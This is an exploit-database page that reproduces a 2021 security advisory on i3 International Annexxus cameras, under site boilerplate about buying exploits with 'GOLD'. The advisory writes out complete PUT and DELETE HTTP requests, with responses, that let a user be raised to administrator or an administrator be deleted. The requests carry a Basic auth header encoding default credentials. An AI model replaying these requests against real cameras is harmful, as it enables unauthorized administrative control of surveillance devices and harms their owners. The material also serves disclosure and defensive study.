0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw Vulnerability
# Exploit Title: i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw # Exploit Author: LiquidWorm # Vendor Homepage: https://www.i3international.com i3 International Annexxus Cameras Ax-n 5.2.0 Application Logic Flaw Vendor: i3 International Inc. Product web page: https://www.i3international.com Affected version: V5.2.0 build 150317 (Ax46) V5.0.9 build 151106 (Ax68) V5.0.9 build 150615 (Ax78) Summary: The Annexxus camera 6MP provides 4 simultaneous, independently controlled digital pan-tilt-zoom (ePTZ) video streams, which may be recorded or viewed live as well as a built-in microphone and speaker allowing two way communication. Desc: The application doesn't allow creation of more than one administrator account on the system. This also applies for deletion of the administrative account. The logic behind this restriction can be bypassed by parameter manipulation using dangerous verbs like PUT and DELETE and improper server-side validation. Once a normal account with 'viewer' or 'operator' permissions has been added by the default admin user 'i3admin', a PUT request can be issued calling the 'UserPermission' endpoint with the ID of created account and set it to 'admin' userType, successfully adding a second administrative account. Tested on: App-webs/ Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5688 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5688.php 27.10.2021 -- Make user ID 3 an Administrator: -------------------------------- PUT /PSIA/Custom/SelfExt/UserPermission/3 HTTP/1.1 Host: 192.168.1.1 Content-Length: 556 Cache-Control: max-age=0 Accept: */* X-Requested-With: XMLHttpRequest If-Modified-Since: 0 Authorization: Basic aTNhZG1pbjppM2FkbWlu User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Content-Type: application/x-www-form-urlencoded Origin: http://192.168.1.1 Referer: http://192.168.1.1/doc/setup.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin Connection: close <?xml version='1.0' encoding='utf-8'?><UserPermission><id>3</id><userID>3</userID><userType>admin</userType><remotePermission><playBack>true</playBack><preview>true</preview><record>true</record><ptzControl>true</ptzControl><upgrade>true</upgrade><parameterConfig>true</parameterConfig><restartOrShutdown>true</restartOrShutdown><logOrStateCheck>true</logOrStateCheck><voiceTalk>true</voiceTalk><transParentChannel>true</transParentChannel><contorlLocalOut>true</contorlLocalOut><alarmOutOrUpload>true</alarmOutOrUpload></remotePermission></UserPermission> HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 14:13:56 GMT Server: App-webs/ Connection: close Content-Length: 238 Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <ResponseStatus version="1.0" xmlns="urn:psialliance-org"> <requestURL>/PSIA/Custom/SelfExt/UserPermission/3</requestURL> <statusCode>1</statusCode> <statusString>OK</statusString> </ResponseStatus> Delete Administrator user ID 3: ------------------------------- DELETE /PSIA/Security/AAA/users/3 HTTP/1.1 Host: 192.168.1.1 Cache-Control: max-age=0 Accept: */* X-Requested-With: XMLHttpRequest If-Modified-Since: 0 Authorization: Basic aTNhZG1pbjppM2FkbWlu User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Origin: http://192.168.1.1 Referer: http://192.168.1.1/doc/setup.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin Connection: close HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 14:20:17 GMT Server: App-webs/ Connection: close Content-Length: 213 Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <ResponseStatus version="1.0" xmlns="urn:psialliance-org"> <requestURL>/PSIA/Security/AAA/users/3</requestURL> <statusCode>1</statusCode> <statusString>OK</statusString> </ResponseStatus> # 0day.today [2024-09-28] #